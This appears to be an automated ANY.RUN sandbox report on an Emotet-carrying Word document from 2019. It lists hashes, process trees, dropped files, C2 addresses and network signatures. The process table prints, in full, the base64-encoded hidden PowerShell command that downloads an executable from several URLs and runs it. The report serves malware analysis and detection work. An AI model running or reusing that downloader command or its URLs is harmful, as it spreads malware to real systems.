analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

UNTITLED_632586_T9336838.doc.zip

Full analysis: https://app.any.run/tasks/b7720a1e-d3ce-42b8-8114-749de9b4a376
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 19:43:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet
trojan
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

1D10DAE8A855CDA457603F0BB59093A5

SHA1:

0C6DB1F069420F061FF5A9E529EB4E93D4243EF8

SHA256:

827AC5109E43FA522A10544D6CC1651E0CCE727391E45CB8FD9A46FB82DCE848

SSDEEP:

1536:QX7CX5ASKpQljNQbpV+79nz7mjZW2SZsEA1WSG3ahDjwJMF3JqEzTGHH/ShB9Zy1:04EiNQbpVozrsEwWSnM2tkQkSjA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 770.exe (PID: 2640)
      • soundser.exe (PID: 2592)
      • 770.exe (PID: 2748)
      • soundser.exe (PID: 4024)
      • 27TaWa.exe (PID: 3784)
      • 27TaWa.exe (PID: 2720)
      • soundser.exe (PID: 2812)
      • soundser.exe (PID: 456)
    • Emotet process was detected

      • soundser.exe (PID: 4024)
      • soundser.exe (PID: 2812)
    • EMOTET was detected

      • soundser.exe (PID: 2592)
      • soundser.exe (PID: 456)
    • Connects to CnC server

      • soundser.exe (PID: 2592)
      • soundser.exe (PID: 456)
    • Changes the autorun value in the registry

      • soundser.exe (PID: 456)
      • soundser.exe (PID: 2592)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3216)
    • Creates files in the user directory

      • powershell.exe (PID: 3216)
    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3316)
    • Executed via WMI

      • powershell.exe (PID: 3216)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3216)
      • 770.exe (PID: 2748)
      • 27TaWa.exe (PID: 3784)
      • soundser.exe (PID: 2592)
    • Application launched itself

      • 770.exe (PID: 2640)
    • Starts itself from another location

      • 770.exe (PID: 2748)
      • 27TaWa.exe (PID: 3784)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3148)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:05:20 19:43:20
ZipCRC: 0xec064e6e
ZipCompressedSize: 81243
ZipUncompressedSize: 130432
ZipFileName: UNTITLED_632586_T9336838.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
11
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winrar.exe no specs winword.exe no specs powershell.exe 770.exe no specs 770.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe 27tawa.exe no specs 27tawa.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3316"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UNTITLED_632586_T9336838.doc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3148"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3216powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOAF8ANABfADAANQA3AF8APQAnAHUAMAAyAF8AOQAwACcAOwAkAFUAOQA2ADQAOQAxADcAXwAgAD0AIAAnADcANwAwACcAOwAkAHcAMwA1ADYAXwA3AD0AJwBWADEAMQAyADYAMgA5ACcAOwAkAHMANgA5ADgAMQBfADEAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQA5ADYANAA5ADEANwBfACsAJwAuAGUAeABlACcAOwAkAEwAOQAwADcANAAxADQAXwA9ACcAaAA3ADcAMAAzADEAOAAnADsAJABtADAAMQA0ADkAOQAwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdABgAC4AVwBgAEUAQgBDAGwASQBlAGAATgB0ADsAJABhADMANAAwADMANwA5AD0AJwBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AcwBoAGUAYwBnAGUAcwBpAGEAXwBjAGoAdABmADcAcwA2AC0AMgA1ADgANgA2ADUAOAA3ADIAMAAvAEAAaAB0AHQAcAA6AC8ALwBhAG4AdABvAG4AcgBlAHMAaQBkAGUAbgB0AGkAYQBsAC4AYwBvAG0ALwB3AGsAZAByAGwAawAvAHAAYQBwAGsAYQBhADEANwAvAE4AdQBqAFUASgBlAHQATgB5AC8AQABoAHQAdABwADoALwAvAGcAYQB3AGEAaABlAHIALQBzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQAvAG4AbgBnAGIAMgA0AHkALwB2AFgARwBBAHAAVwBVAHcAZAAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAZQBwAHIAbwBwAGUAcgB0AHkAZABlAGEAbABlAHIAegAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAegBlADcAdgBzAF8AdABnAHQANgBlADMAawAtADUALwBAAGgAdAB0AHAAOgAvAC8AZwB1AGkAbQBhAHIAYQBlAHMAYwBvAG4AcwB0AHIAdQB0AG8AcgBhAHMAagBjAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgBUAGwAVABaAHQAQQBVAEIALwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcwA1ADQANAAyAF8AMwA9ACcASAA1ADgANQAzADAANwBfACcAOwBmAG8AcgBlAGEAYwBoACgAJABaADEAOQA5ADEAOQA1AF8AIABpAG4AIAAkAGEAMwA0ADAAMwA3ADkAKQB7AHQAcgB5AHsAJABtADAAMQA0ADkAOQAwAC4ARABvAFcATgBsAG8AYQBkAEYAaQBsAGUAKAAkAFoAMQA5ADkAMQA5ADUAXwAsACAAJABzADYAOQA4ADEAXwAxADIAKQA7ACQAagAzADEANwBfADEAMQAwAD0AJwBxADIAOQA0ADIAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHMANgA5ADgAMQBfADEAMgApAC4AbABlAG4ARwBUAEgAIAAtAGcAZQAgADIAOQAyADIAOAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABzADYAOQA4ADEAXwAxADIAOwAkAGoAOAAyADEANgA5ADcAPQAnAFYAOAAzADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAG4AMAA1ADQAMgAxADUAPQAnAEMAOAA1ADQANAA1ADkANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADMANwA5ADUAMgA9ACcASgAwADcAOQA5ADEAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2640"C:\Users\admin\770.exe" C:\Users\admin\770.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2748--1fcd1deeC:\Users\admin\770.exe
770.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4024"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
770.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2592--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2720"C:\Users\admin\AppData\Local\soundser\27TaWa.exe"C:\Users\admin\AppData\Local\soundser\27TaWa.exesoundser.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3784--54b79703C:\Users\admin\AppData\Local\soundser\27TaWa.exe
27TaWa.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2812"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
27TaWa.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
2 235
Read events
1 730
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
3
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3148WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR113E.tmp.cvr
MD5:
SHA256:
3216powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFXWN0O6X276TJDQWOJW.temp
MD5:
SHA256:
2592soundser.exeC:\Users\admin\AppData\Local\soundser\27TaWa.exeexecutable
MD5:B1994F37B1CA47638931DD05D2A92727
SHA256:F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A
3216powershell.exeC:\Users\admin\770.exeexecutable
MD5:9725D9368E642E74586456BBAD9F37B5
SHA256:8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9
3148WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\~$TITLED_632586_T9336838.docpgc
MD5:633F310DCFF68B75D5595D8813D077EA
SHA256:DC4E790594796BF5E67673F904CB207C64D81E8FD70BFBD9012BEDF4D81EF376
2748770.exeC:\Users\admin\AppData\Local\soundser\soundser.exeexecutable
MD5:9725D9368E642E74586456BBAD9F37B5
SHA256:8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9
378427TaWa.exeC:\Users\admin\AppData\Local\soundser\soundser.exeexecutable
MD5:B1994F37B1CA47638931DD05D2A92727
SHA256:F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A
3148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E839C6D.wmfwmf
MD5:D9D7118DA48B5A042BBFD83E427173A5
SHA256:78F9FCB0F03DE13835236497993D7D91C6E491AD125138D34A88A425DC44D643
3316WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.docdocument
MD5:016FFFBE5A3CF1E23EF25C5393B821C3
SHA256:9630E97DD14EE791FFCC2FAF3C333E3D19145F087026542EF5AE5A240D69E1F7
3148WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43A75F8A.wmfwmf
MD5:4DA40A42C6AF15E0CF721E5CF4061D7C
SHA256:B9F68F39C8725D5792AB11F7FB3AE8530B393EE8C71E9426C1FC9D9DC523277E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
456
soundser.exe
POST
200
74.207.227.96:443
http://74.207.227.96:443/enable/schema/ringin/merge/
US
binary
148 b
malicious
2592
soundser.exe
POST
200
74.207.227.96:443
http://74.207.227.96:443/entries/
US
binary
65.9 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2592
soundser.exe
74.207.227.96:443
Linode, LLC
US
malicious
456
soundser.exe
74.207.227.96:443
Linode, LLC
US
malicious
3216
powershell.exe
69.90.66.10:443
overcreative.com
Peer 1 Network (USA) Inc.
CA
unknown

DNS requests

Domain
IP
Reputation
overcreative.com
  • 69.90.66.10
unknown

Threats

PID
Process
Class
Message
2592
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2592
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
456
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
456
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
6 ETPRO signatures available at the full report
No debug info